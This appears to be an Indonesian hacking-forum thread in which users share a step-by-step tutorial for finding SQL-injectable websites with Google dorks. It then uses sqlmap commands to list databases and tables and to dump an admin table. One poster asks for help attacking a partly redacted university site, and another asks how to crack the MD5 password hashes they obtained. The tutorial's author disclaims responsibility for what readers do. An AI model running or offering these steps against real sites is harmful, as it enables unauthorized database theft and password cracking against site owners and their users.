SQLi Sqlmap.py
@ atas : terserah mau pake Tools buat sendiri dengan menggunakan dan menfaatkan google,bing dan lain-lain

atau kunjungi website Search engine yang kamu biasa pakai atau menggunakan BOT yang di taruh di server ..

banyak cara untuk cari Bug SQLi atau kamu melakukana Scan Hole dengan Vega ke website dan menemukan Bugs SQLi itu sesuka kamu yang penting kamu mengerti apa yang rusah.,,,
Hidup Harus Di Bawa Happy..!!!

klo kaya gitu sih ane udah tau bro Big Grin [ASK] klo nyari halaman admin suatu website melalui backtrak atau yg lain kaya gmana? yg tau mohon kasih tau Big Grin

read rulles om Smile bertanya hanya pada pebahasan judul ga boleh out of topic aka OOT

mantep gannnn ....

thx ya .....

para saudara2 sya mohon bantuannya untuk hack ni web solusinya gimana nih?
saya menggunakan sqlmap

#python sqlmap.py -u http://www.xxx.ac.id/index.php?option=co...Itemid=498 --dbs (enter)

----->ALHASIL KAYAK DI BAWAH INI<-----

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:10:46

[13:10:47] [INFO] testing connection to the target url
[13:10:51] [INFO] testing if the url is stable, wait a few seconds
[13:10:55] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [©ontinue/(s)tring/®egex/(q)uit] c
c: command not found

[2]+ Stopped python sqlmap.py -u http://www.xxx.ac.id/index.php?option=com_content

[2]+ Stopped python sqlmap.py -u http://www.xxx.ac.id/index.php?option=com_content

--->Kenapa itu ya brow?? <----
Mohon pencrahanyaa.

link ane edit, terlalu frontal
@junior

Sql map semua web pada menggunakan md5
apa ada solusinyaa..

(11-08-2012, 04:24 PM)dvil Wrote: Sql map semua web pada menggunakan md5
apa ada solusinyaa..

solusi apa maksudnya mas??

(11-08-2012, 04:28 PM)junior.riau18 Wrote:
(11-08-2012, 04:24 PM)dvil Wrote: Sql map semua web pada menggunakan md5
apa ada solusinyaa..

solusi apa maksudnya mas??

gini omjunior
rata2 password yang didapatkan sqlmap di enkripsi md5
apa ada toll yang cepet buat decrtypt selain john the ripper :-?

SQLi Sqlmap.py
ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...

ok langsung aja dari pada lama2..

yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...

hihihiihih tongue

ok serius nie..

1.buka SQL Map kalian dengan cara
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...

3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...

4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..

5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://site.com -D gatotganteng -T Admin --columns

Code:
pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump

kalo udah begini silakan dah..

mau kalian apain tapi yang jelas w kgk tanggung jawab ya..


wkwkwkkwkwkkwk

:ngakak:

udah jangan lupa

:kasihcendol:

wkwkkwkwk

salam veronochi

dan w hanya mau berbagi kepada orang-orang yang mau belajar... [/font]

om, saya mau tanya..
gimana caranya sqlmap ke site yang tidak ada "...?id=1" atau sejenisnya..
contoh linknya "127.0.0.1/web/index.php"
saya mencoba membuat web di localhost, dan saya coba menggunakan tools ini.
bagaimana cara agar mendapatkan databasenya?
terimakasih.
Security awareness should be the continuing practice of a skill and not the continuous reminder of a threat.






Users browsing this thread: 5 Guest(s)